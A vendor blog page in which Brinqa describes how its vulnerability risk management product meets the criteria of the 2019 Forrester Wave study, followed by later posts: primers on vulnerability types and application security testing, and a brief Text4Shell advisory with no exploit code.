How Brinqa addresses the technical capabilities outlined in the 2019 Forrester Wave™: Vulnerability Risk Management study
October 18, 2019 by Syed Abdur

Brinqa has been named as a ‘Contender’ in the Forrester Wave™: Vulnerability Risk Management study released in Q4 2019. This is Brinqa’s first placement in this annual study conducted by Forrester to evaluate the competitive landscape of this crucial cybersecurity field. While we may not entirely agree with the methodology used, we are grateful and appreciative of the opportunity to participate in this study. We also commend Forrester for their efforts to reshape the traditional vulnerability scanning market to better reflect modern vulnerability risk management programs.

The analyst team has done an excellent job of outlining the critical product capabilities used to compare vendors in this space. Practitioners should look to these criteria not only as they evaluate vendors but also as they assess the effectiveness and maturity of their existing Vulnerability (Risk) Management processes. Read on to learn how we at Brinqa recommend organizations interpret and implement these critical capabilities for effective vulnerability risk management. Please note that this does not, in any way, represent Forrester’s position on these criteria.

Vulnerability Enumeration

Vulnerability enumeration capabilities determine how accurately, efficiently, and completely a VRM program identifies and catalogues the vulnerabilities and weaknesses in an organization’s IT infrastructure. As each enterprise IT environment is unique, organizations should focus on ensuring that all significant components of their infrastructure are covered and accounted for.

Brinqa implements this function by utilizing our vast collection of integrations to the leading vulnerability scanning and assessment products. We take a vendor-agnostic approach that allows our customers to leverage the tools that best suit their environment and scanning requirements. This means providing the most comprehensive integrations with security tools for each important facet of the IT infrastructure :

  • Networks — BeyondTrust, Digital Defense, OpenVAS, Qualys, Rapid7, Tenable, Tripwire, VulnDB
  • Applications — Acunetix, BurpSuite, Checkmarx, Contrast Security, Fortify, IBM AppScan, Netsparker, Qualys WAS, Rapid7 Appspider, Sonatype, Synopsys, Veracode, Whitehat, Whitesource
  • Cloud — AlertLogic, Amazon Inspector, Prisma Public Cloud
  • Containers — AquaSecurity, Twistlock
  • Configurations — Microsoft SCCM, Qualys PC, Tripwire Enterprise
  • Mobile — NowSecure
  • Bug Bounty — BugCrowd, Synack
  • Penetration Testing — Generic Flat File, Direct-to-database

However, effective vulnerability enumeration is about more than just collecting vulnerabilities. To handle real world scenarios (scanner replacement, separate scanners for internal vs. external assets, M&A activity, passive scanning, deduplication, false positives) organizations need advanced data management capabilities. The Brinqa solution allows organizations to normalize vulnerability data from disparate assessment tools to a common, standardized ontology. This is essential for implementing consistent vulnerability risk management practices across the entire scope of the program. The solution enables configurable scoping so that organizations can focus on the most critical infrastructure components and vulnerabilities first, and then gradually expand their program. In the case of overlapping scanning or assessment tools, the solution provides features to de-duplicate and coalesce vulnerability records from multiple sources.

Digital Footprinting

Digital footprinting can help organizations gain an understanding about which of their assets are publicly accessible and which are relatively protected behind firewalls and DMZs. This classification should be established, if possible, and used to inform determinations of asset criticality, ownership, escalation chains, SLAs, and other operational considerations.

Brinqa Vulnerability Risk Service implements this function through integrations with asset discovery services like BitSight and incorporates an organization’s digital footprint (including determination of publicly accessible assets) into VRM processes. The real power of the solution is in operationalizing an organization’s digital footprint towards better asset management and hygiene.

Rouge (or unknown) assets can be organized and monitored through rules that ensure the footprint matches the asset source of truth, and trigger automated tasks and tickets for corrective actions when necessary. By updating in near-real time, the digital footprint can be leveraged to determine the existence of new or unmanaged assets which can then be automatically assigned to the appropriate asset groups or risk owners.

Asset Criticality (or better yet, Asset Management)

An organization’s ability to correctly assign asset criticality directly impacts the accuracy and soundness of risk-based vulnerability prioritization. However, we would argue that asset management  (and not just asset criticality) is a crucial function that VRM teams and programs should address with great attention. Effective asset management is accurate (results in an exhaustive inventory of all the assets in the scope of the program), comprehensive (covers every relevant factor of asset identity and usage), and functional (includes criticality, ownership, escalation chains, and all other operational aspects).

Asset Management is likely the least standardized component of VRM programs. Almost every organization represents, classifies, and tracks assets in their own unique way. Further, asset information resides in a variety of systems and programs all across the organization.

Brinqa addresses this unpredictability by

(a) providing a comprehensive asset data model that represents most common technical (type, vendor, network segment, operational status, internal/external, publicly accessible) and business impact (data classification, monetary value, supported business services, compliance requirements, location, data center, business unit) factors, and

(b) providing a completely dynamic, extendible data model (enabled by our graph database backend) so that organizations can easily incorporate any factors that are unique to them.

This information is populated through purpose-built integration with a variety of systems — Asset Discovery (Nmap), CMDB (BMC, Cherwell, HP, ServiceNow), Network Management (RedSeal, InfoBlox), and GRC (Archer). Often this information resides in other programs (data protection, business impact analysis, disaster recovery) or in proprietary systems and is collected using flat file, LDAP, or direct-to-database connectors. The asset criticality calculation is part of the extensible data model and can be modified by administrators to accurately reflect the organization’s IT environment. This ensures complete transparency and control over the determination of asset criticality.

Network Exposure

Accurately determining network exposure can help organizations understand the true structure of their network infrastructure and establish the relationships and dependencies between assets that can be leveraged for attack path analysis. Building this information into the risk analysis model gives organizations a true picture of the risk associated with a vulnerability or asset.

Brinqa Vulnerability Risk Service implements this function through integrations with network management (Cisco, InfoBlox, RedSeal) and CMDB (BMC, Cherwell, HP, ServiceNow) systems to present a complete picture of the network architecture. Network metadata like network criticality, type (e.g. DMZ), leap-froggable, accessible from untrusted networks, etc. and attack path data like attack depth and downstream risk can be incorporated in the risk prioritization model.

The solution includes an OOB network segmentation model and assets can be dynamically associated with segments  based on IP ranges and other factors. Organizing assets along network segments also gives IT users a perspective of vulnerability risk that aligns with their day-to-day operations.

Vulnerability Severity

The ability to accurately and expeditiously determine and incorporate threat intelligence into risk prioritization can mean the difference between a breach and a secured environment. VRM programs should ensure that factors of exploitability and indicators of compromise are evaluated continuously and there are measures in place to trigger the appropriate workflows if any changes are detected.

Brinqa leverages our vast collection of purpose-built integrations with most common open source and commercial threat intelligence providers (Accenture iDefense, AlienVault, CrowdStrike, Digital Shadows, FireEye, NVD, Recorded Future, Secureworks, Symantec DeepSight Intelligence, TruSTAR) to establish the most accurate view of vulnerability severity. This incorporates factors like exploit availability, weaponization, zero-day, popularity, pervasiveness, and patch availability. The solution gives administrators complete control over how various threat intelligence criteria come together to determine vulnerability severity. Intelligent correlation easily sifts through large volumes of threat intel to identify and incorporate those factors that have an impact on the organization’s unique technology environment.

Risk Based Prioritization

Risk based prioritization brings together all the underlying asset, vulnerability, and threat information to accurately identify and highlight the vulnerabilities that pose the biggest risks to the organization. Risk is inherently subjective, so it’s imperative that VRM programs and teams incorporate in the prioritization process any unique aspects of the organization that have an impact on risk.

Brinqa implements this function by first establishing a customer’s unique Cyber Risk Graph — a real-time representation of infrastructure and apps, delineation of interconnects between assets and to business services, and knowledge of overall cyber risk. This serves as the single, unified view and source of truth that drives an informed, risk-based prioritization of vulnerabilities.

Brinqa Vulnerability Risk Service includes an OOB best-practices-based risk prioritization model that customers can use as is or that can be extended to incorporate any additional factors. The solution does this by providing administrators with access to editable Groovy scripts that represent calculation logic, a regulated means to referentially access the underlying cyber risk graph. This is a common design pattern for software platforms that brings the benefits (simple syntax and semantics, easy to learn and write) of scripting languages like Groovy to the implementation of powerful customizations without the need to rely on vendor product or service teams.

The flexibility and control provided by the open calculations is key to VRM success in complex and dynamic environments. Enterprise technology environments are often in flux – scope expands, asset types diversify, scanners multiply, threat intel feeds are added, business context factors become relevant. Brinqa’s open data model and risk scoring is critical to our customers’ ability to adapt and continue to deliver effective results in these scenarios. Solutions that provide rigid and prescriptive risk models cannot handle this type of dynamic environment, a big reason why customers choose Brinqa.

Metrics & Reporting

Comprehensive metrics and reporting capabilities are crucial to VRM programs’ ability to effectively and intuitively engage and inform all the varied stakeholders across IT, security, and business at the appropriate instant in the risk lifecycle. The ability to visually communicate key risk and performance indicators through powerful metrics and reports are crucial to program success. Organizations must empower and encourage stakeholders to develop and communicate the metrics and reports that matter to them.

Brinqa Vulnerability Risk Service includes an extensive library of risk and performance metrics and reports. The solution includes a sophisticated, BI-like analytics interface that is used to build all the views, reports and dashboards in the solution. This gives users complete access to the underlying graph data model and can be used to create powerful, self-service metrics and reports with the ability to configure nearly every aspect of visualization (layout, color schemes, metrics calculations, data representation).

Role Based Management

Role-based management of access, permissions, and data is necessary to ensure that the varied stakeholders in the VRM process can work together without any risk of data compromise.

Brinqa delivers fine-grained access controls within the platform that are configurable from the UI. Default roles such as Configurator, Risk Analyst and Security Administrator are available out of the box, but most customers use default and custom roles to reflect the uniqueness of their organization. Large customers segment and define access levels based on responsibilities (executive/business owner/security), geography, business unit and regulatory restrictions.

Limiting access to data makes it easier for individuals to own, manage and communicate risk responsibilities through a subset of vulnerability data, risk scores, metrics and reports. Role management capabilities and access controls are also used by enterprises and MSSPs to segregate data/knowledge to limit who can see what on a need-to-know basis, and to control who is empowered to customize the vulnerability risk solution. Brinqa also enables UI components such as menus and dashboards to be customized based on users’ roles.

Remediation Management

While the Forrester Wave study does a good job of outlining most important considerations for VRM programs, a crucial scoring criteria that is conspicuously missing is remediation management. While better prioritization can highlight the most important vulnerabilities from the backlog, better remediation management can significantly reduce the overhead associated with risk remediation and improve remediation effectiveness, efficiency, and consistency. Organizations should look to improve their vulnerability remediation practices and replace ad hoc decisions with well thought out, repeatable policies that leverage automation to achieve predictable results.

Brinqa implements a rule-based ticketing mechanism for automated remediation management. Brinqa customers are encouraged to formulate policies that govern how tickets should be created and managed. These rules are run automatically when new vulnerabilities are discovered. The rules allow vulnerabilities to be grouped together based on common criteria, thereby significantly reducing the volume of tickets being created (and the overhead associated with managing them). Rule configuration also allows ownership and SLAs to be set and enforced dynamically, ensuring consistency of remediation efforts.

Brinqa solution includes native ticket lifecycle management but it’s more common for Brinqa customers to utilize an external ITSM tool for managing ticket lifecycles. This is achieved through bi-directional integrations with leading ITSM systems (Jira, BMC Remedy, CA Service Desk, Cherwell, ServiceNow). Similar to ticket creation rules, ticket closure rules can be set up to validate risk remediation effectiveness and close tickets automatically.


Access the full 2019 Forrester Wave™: Vulnerability Risk Management report here.


Recent Posts
November 22, 2022
A primer on the types of cybersecurity vulnerabilities organizations face

Vulnerabilities are everywhere in the cyber systems on which enterprises rely for, well, everything. The need for an effective vulnerability risk service has never been higher. The number of cybersecurity vulnerabilities grows along with the number of cyber systems and users, significantly increasing the attack surfaces of corporate network infrastructures. Organizations need a vulnerability risk service that connects, models and analyzes all relevant security, context and threat data to deliver knowledge-driven insights for vulnerability prioritization, remediation and reporting. Here’s why. A vulnerability is "a weakness in the computational logic found in software and hardware components that when exploited, results in a negative effect to confidentiality, integrity, or availability,” according to the National Vulnerability Database (NVD). NVD and Microsoft security updates are two free sources for vulnerability definitions. For more definitions, you can also pay for subscriptions to vulnerability databases available from cybersecurity vendors.  There are two types of vulnerabilities: known and unknown. Let’s take a look at each one. Known vulnerabilities If you know about a vulnerability’s existence, you can defend it — at least theoretically. The following are known vulnerabilities present in many corporate infrastructures.  Familiarity When an attacker is familiar with the code, software, operating systems and hardware of an organization, the chances are high that the attacker will find a vulnerability.  Complexity The more complex a system is, the higher the probability a flaw or misconfiguration will result in unintended access. Connectivity ‍The more connections a device has, the greater the chance a vulnerability exists among them. Poor password management Computers do the grunt work necessary for a brute-force attack, hurling password combinations at the speed of digits, hoping to uncover weakness. When users reuse passwords, a single breach can become many breaches, as the attacker tries the same password on different systems and platforms. Software flaws When an operating system is not secured, an attacker can access it to inject viruses and malware. ‍Sometimes programmers unintentionally leave exploitable bugs in software. Users leave their systems vulnerable by not updating or patching their software. Antivirus vulnerabilities The irony of antimalware solutions is situational – instead of protecting users from malware,  antimalware solutions expose users to vulnerability exploitation. Antimalware grants extensive permissions an attacker can abuse to access a system. Users ‍People who use computers are easily the most significant and weakest link in the entire security chain. According to the 2022 Verizon Data Breach Investigations Report:  80% of data breaches are from poor or reused passwords.  82% of breaches involved credentials. 82% of breaches involved a human element. 7% of breaches involved vulnerability exploitation. If not for users, phishing wouldn’t exist. Nor would social engineering. The former is an email message sent in the hope the recipient will click on an included link set to deliver a malware payload. The latter is a lie or deception used to enter a network for a cyberattack.  Physical cybersecurity threats When planning the protection of a network, it’s easy to forget about the physical security of IT assets, such as your buildings and infrastructure. Also, consider users’ security and privacy in cyber-physical systems. They can be bribed or intimidated into relinquishing valuable information.   Denial of service (DoS) A denial-of-service (DoS) attack is a malicious attempt to prevent legitimate traffic from accessing a website by overwhelming the web server with meaningless requests.  Application security testing (AST) Application security testing (AST) is the process of identifying security weaknesses and vulnerabilities in source code to harden applications by making them more resistant to security threats. According to Gartner research, “84% of breaches exploit vulnerabilities in the application layer, yet the ratio of spending between perimeter security and application security is 23-to-1.” If you’re aware of an application vulnerability, you can test for it.  Dynamic application security testing (DAST)  Dynamic application security testing (DAST) tools execute code and then inspect it at runtime to detect issues that might be security vulnerabilities. Issues may be with query strings, requests, responses, scripts, memory leaks, cookie handling, session handling, authentication, executing third-party components, and code and data injection. Static application security testing (SAST) Static application security testing (SAST) scans application source, binary, and byte code to identify vulnerability causes and assist with remediation. SAST tools attack applications from inside to perform a scan, inspecting static source code and reporting weaknesses. Interactive application security testing (IAST) Interactive application security testing (IAST) analyzes code for security vulnerabilities while the application is running. That can be an automated test, a human tester, or anything “interacting” with application functionality. Because it reports vulnerabilities in real time, IAST doesn’t add more time to your improvement and deliverability. Web application security testing Web application security testing involves assessing a web application for security flaws and vulnerabilities that require fixing before hackers take advantage of them. Meticulously testing for hidden vulnerable points in your application lessens the risk an attacker will find and exploit one of them. The Verizon 2022 Data Breach Investigations Report mentioned above found that 56% of breaches involved basic web application attacks. Software composition analysis (SCA) Software composition analysis (SCA) identifies specific open-source versions, software components, and licensing risks. It helps to ensure all embedded open-source code meets selected standards.  Advanced SCA tools have automated component detection and identification, as well as vulnerability, license association, and risk remediation. Unknown vulnerabilities When a home full of intelligent devices suffers more than 12,000 hacking or unknown scanning attacks from around the world in one week, can you imagine how many more risks to a network there are? Since your network is more extensive — and more valuable — than the technology of the average home, it presents a more significant target.   Zero-day A software flaw hackers have discovered while the developer remains unaware of it is known as a zero-day vulnerability. It’s called “zero-day” because it had never been seen before and the software vendor had “zero” time to patch it before criminals exploited it.  Trust relationship Trust configurations propagated across your network simplify user access between systems. Adverse possession of those trusted credentials opens the systems to attackers. After gaining access to a system, the adversary can breach all other systems that trust the system that was initially compromised. Compromised credentials  To get unauthorized access to a system in your network, attackers try to intercept and extract passwords from unencrypted or incorrectly encrypted communication, either from unsecured handling by software or users. Attackers also try to exploit passwords by reusing them across systems. Malicious insider Potentially the most dangerous security bad actors and the one motivated to do serious damage is the stealthy insider: a disgruntled team member with access to your critical systems. They may choose to exploit their access privileges to steal or destroy your data.  How do you find unknown vulnerabilities?  Penetration testing Penetration testing, or pen testing, is an exercise in which a cybersecurity professional probes a network to find and exploit vulnerabilities. Simulated attacks are how a pen tester identifies weak spots in system defenses that defenders can fix to tighten security. Pen testing is an intricate, specialized practice area that is critical to business security.  Breach and attack simulation (BAS) To perform comprehensive assessments of your cybersecurity defenses, you need automated breach simulation and attack simulation, continuous assets scanning, and protection. Breach and attack simulation (BAS) spots gaps in your security and helps you understand how well-defended you are against real threats to your systems. A BAS platform mimics the actual actions of a threat by simulated attacks against your data center, allowing you to assess your security controls and take action designed to catch a real threat actor when the need arises.  Often offered as software-as-a-service (SaaS), BAS goes beyond traditional testing methods such as penetration testing and vulnerability scans by simplifying how you conduct checks on your security controls. Modern BAS tools permit automated testing including customized, automated, simulated attacks. Unlike traditional penetration tests in which humans perform hacking attempts, cloud-based BAS apps host modules that run automated tests. The malware used doesn’t harm your network infrastructure and works only for the simulation. Brinqa performs vulnerability risk management Using connectors to pull data from all sources on your entire network, Brinqa calculates rules, performs advanced operational risk analysis, and applies specific business contexts to pinpoint those vulnerabilities you must fix first. It automatically creates tickets and tasks for remediation.  The capability for extensive visibility into all of your existing assets, information and infrastructure is practically infinite, meaning you can add more data and grow your network without worry.  Get your free trial to experience how easily Brinqa delivers efficient, repeatable and trustworthy results by automating your vulnerability risk management. FAQ  How do a vulnerability, a threat and a risk differ? Sometimes confused with vulnerability, a threat is anything capable of exploiting a vulnerability, whereas a risk is when a threat exploits a vulnerability. You worry about a threat occurring to an asset. You calculate the potential damage from a risk. What is a threat agent in information security? The National Institute for Standards and Technology defines a threat agent synonymously with a threat source as, “The intent and method targeted at the intentional exploitation of a vulnerability or a situation and method that may accidentally trigger a vulnerability.” What are the reasons why information systems are vulnerable? Being interconnected and accessible from many points in the connection makes information systems vulnerable.  What are cyber-physical systems? The Cyber-Physical Systems Research Center tells us cyber-­physical systems (CPS) happen when digital and analog devices, interfaces, sensors, networks, actuators and computers are combined with the natural environment and with human-made objects and structures. A CPS depends upon integrating computational algorithms and physical components.  What is cyber-physical security? Cyber-physical security concerns securing physical systems used to maintain and implement cybersecurity solutions. It includes the technology necessary for operations, industrial control systems, and the Internet of Things. The proliferation of devices has led to physical and cybersecurity convergence.

November 18, 2022
Types of Application Security Testing: Definitions and Differences

Aggregating the findings of AST tools delivers a holistic, app-centric approach to security It may be cliche, but almost every company today is an application development company. And the increasing number of security breaches and sophisticated threats are driving the application security testing (AST) market. Compliance regulations, the move to remote work, and the need to protect critical customer and company data also are compelling organizations to adopt AST. Software sellers have realized that building AST into their applications is a best practice because prevention is almost always better — and less expensive — than finding vulnerabilities in the wild after applications are deployed. Application security testing AST is the key to identifying security weaknesses and vulnerabilities in source code. It hardens applications by making them more resistant to security threats. AST was initially performed manually, but the expanding amount of software, open-source components, and the increasing number of known vulnerabilities have driven the need to automate AST. Most organizations that use AST also combine it with a few key application security tools. Application risk management is a vital component of software security, especially since Gartner research found that vulnerabilities in the application layer are responsible for 84% of breaches. Dynamic application security testing A dynamic application security testing (DAST) scan executes code and then performs a dynamic code analysis to detect possible security vulnerabilities. Those vulnerabilities occur in query strings, requests, responses, scripts, memory leaks, cookie handling, session handling, authentication, executing third-party components, and code and data injection. DAST assessments attack applications from outside, which enables the detection of more vulnerabilities and the testing of more applications. You can use DAST tools to conduct scans that simulate many unexpected malicious test cases and then you'll receive a report showing how the application responded. While DAST automation reduces the need to manually check for security risks and perform lengthy scans, it does lack actionable advice for developers. A dynamic code analysis scan must be completed using other security measures and tools. Static application security testing (SAST) Static application security testing (SAST) is a security tool developers use to conduct code scanning on application code early in the DevOps process. SAST scans application source, binary, and byte code to identify vulnerability causes and assist with remediation. The application need not be running for SAST to analyze the code. SAST tools attack applications from the inside, inspecting static source code to report security weaknesses. SAST tools do not require an operating system. By providing immediate feedback about potential code issues to developers during development, SAST reduces security risks in applications. It helps educate developers about security while they work. Real-time recommendations and line-of-code navigation lead to faster discovery of vulnerabilities and auditing collaboration. Developers can create more code with fewer vulnerabilities, which results in a more secure application. The differences between SAST and DAST DAST cannot see into code, which is why developers must use SAST to pinpoint the areas where those problems occur. On the other hand, running SAST in a static environment can only uncover runtime security vulnerabilities. That makes it practical for only a portion of the job. Because DAST scanners find vulnerabilities late in the software development cycle, the issues it finds are time-consuming and cost more to fix than if they’d been discovered earlier. Interactive application security testing (IAST) Interactive application security testing (IAST) examines code for security vulnerabilities at runtime. Anything “interacting” with application functionality, such as a human tester or automated test, may be interactive testing. IAST does not slow your improvement and deliverability, because it reports vulnerabilities in real time. IAST differs from static analysis (SAST) and dynamic analysis (DAST) by working within an application through the code. It detects and reports issues while the application is running. It doesn’t test the entire application or codebase, only what the functional test uses. Web application security testing (WAST) Web application testing (WAST) lets developers assess a web application for security flaws and vulnerabilities and fix them before hackers can take advantage of them. There is less risk that an attacker will find and exploit a hidden vulnerable point after rigorously testing the security of a website. Mobile application security testing (MAST) Mobile application security testing (MAST) examines a mobile application similar to the way a malicious user attacks it. Start by understanding the purpose of the application and the type(s) of data it deals with. Then perform static and dynamic analyses and penetration testing to arrive at an assessment, which finds vulnerabilities that otherwise would have been missed had those tools not been used together. The biggest issue with mobile applications is most are developed with little thought about security until the shipping date, at which point bare minimum security gets tacked on. Runtime application self-protection (RASP) Runtime application self-protection (RASP) sits within your application and protects it against known and zero-day vulnerabilities in your code, without signatures. RASP resides on a server, where it detects attacks against applications in real time. It intercepts all application calls to the system, ensures the calls are secure, and validates data requests directly within the application. When an application runs, RASP protects it from maliciousness by analyzing app behavior and its behavioral context. By continuously monitoring its own behavior, RASP identifies and mitigates attacks immediately — without human intervention. Since RASP detection and protection features run on the server, it doesn’t affect the design of the application being tested. RASP can protect both web and non-web apps, finding unknown payloads, obfuscated and context-dependent attacks, and zero-day threats. Software composition analysis (SCA) Software composition analysis (SCA) distinguishes licensing risks, particular open-source versions, and software component security. SCA helps ensure all open-source code meets necessary standards. Advanced SCA tools offer automated component detection and identification, as well as vulnerability, license association, and risk remediation. How Brinqa helps your AST Brinqa is the main dashboard for cyber risk management across your IT environment. Brinqa helps you get more out of your security by: Connecting all DevOps and AppSec tools into a single program that normalizes data from various systems and processes into a formalized solution to address the unique application security needs of your organization. Classifying and cataloging all your software assets and tracking how each affects your business. Improving efficiency and consistency by automating risk analysis of your development, security and operations processes. Delivering security reports and recommendations designed to make software development more manageable and secure, which your developers will eagerly anticipate. Modeling risk data and automating ticketing for remediation. Providing security training and education to your employees and developers with Brinqa risk insights, to help avoid risks before they enter your network. Dynamic application security development enables you to add risk factors and security testing results anywhere along the software development lifecycle, from planning, through development and testing, to release. Get your free trial and see how easily Brinqa delivers effective, consistent and reliable results. FAQs What are the web application security testing steps? The steps for web application security testing are: Establish the scope by determining what applications, network systems, and code you will test; how you will test them; and what you expect to deliver. The most comprehensive results come from testing as a typical user, an untrusted outsider, and a user with full application privileges. Choose the appropriate testing tools to deliver the results you seek. For example, source code analysis, web applications, and user permissions require different testing tools. Scan for vulnerabilities by sorting the tests into groups to ease the testing process. Validate your vulnerability scanner findings by approaching your application with an attacker mindset and imagining all the damage an attacker can do to your application. Document and disseminate your findings by assembling your data into a report you can provide to others. What is the difference between software testing vs. security testing? Software testing is evaluating and verifying that a software application works as intended. Testing also helps prevent software bugs, reduce development costs, and improve performance. Security testing is software testing intended to find all possible system vulnerabilities and protect data and resources. It also ensures that the software systems and applications are free from risks and threats. What is the difference between DAST vs. penetration testing? You can run DAST during development, allowing developers, testers, or security teams to gather results before software release and fix vulnerabilities sooner and, therefore, less expensively. You can perform penetration testing only after you’ve completed development. Pen testing reveals highly possible attack scenarios, but little coverage of code. What does "exploitable" mean? Exploitable in cybersecurity means anything that can be exploited for selfish or unethical reasons, especially commercially. Attackers seek exploitable vulnerabilities, meaning those with both an exploit method and a path that allows exploiting. What is penetration testing in a production environment? Penetration testing in a production environment enables testing the entire solution and granting an accurate picture of what happens during operation. It also provides a view into which assets are most attractive to an attacker and measures when the security tools you implemented detect the attacks. How vital is front-end web security? Front-end web security is as vital as backend code security. The entrance to your website is open to the world and is complex, completes more, and is consequently more potent than it used to be. Increased complexity and performance expand the number of attack surfaces. What are front-end security best practices? Front-end security best practices begin with a good security policy. Make security part of the development process by using a framework that automatically considers it. For example, you can reduce browser feature access and prevent clickjacking attacks by disabling iframe embedding. You also need to be judicious when adding third-party services. What is a DAST screening tool? DAST tools execute code and then inspect it at runtime to detect possible security vulnerabilities. What is dynamic security training? Dynamic security training is a hands-on approach to educating and informing people on cybersecurity risks and threats that require entire team member engagement. Dynamic security training gives users an idea about hazards they might encounter, how to handle them, and how in the future to mitigate those risks.

November 9, 2022
CVE-2022-42889 Text4Shell

On 2022-10-13, the Apache Security Team disclosed a critical vulnerability with CVE-2022-42889 affecting the popular Apache Commons Text library. This vulnerability is popularly named “Text4Shell” which when exploited can allow an unauthenticated attacker to execute arbitrary code on the vulnerable asset. A CVSSv3 score of 9.8/10 is assigned to this vulnerability. Apache Common Text versions 1.5 through 1.9 are impacted by this vulnerability and have been patched with Apache Commons Text version 1.10 and above. Apache Commons Text is a widely popular low-level library for performing various text operations, such as escaping, calculating string differences, and substituting placeholders in the text with values looked up through interpolators. When using the string substitution feature, some of the available interpolators can trigger network access or code execution. This is intended, but it also means an application that includes user input in the string passed to the substitution without properly sanitizing it would allow an attacker to trigger those interpolators. Brinqa Response: Brinqa does include the affected versions in parts of its application, but we do not use untrusted strings as input and we are not vulnerable based on the information we have at this time. We are updating the affected version to 1.10 where this library is used. Affected products: Brinqa 5.x Brinqa 10.x More updates to come as we get further information. If you have any questions or concerns, please contact us at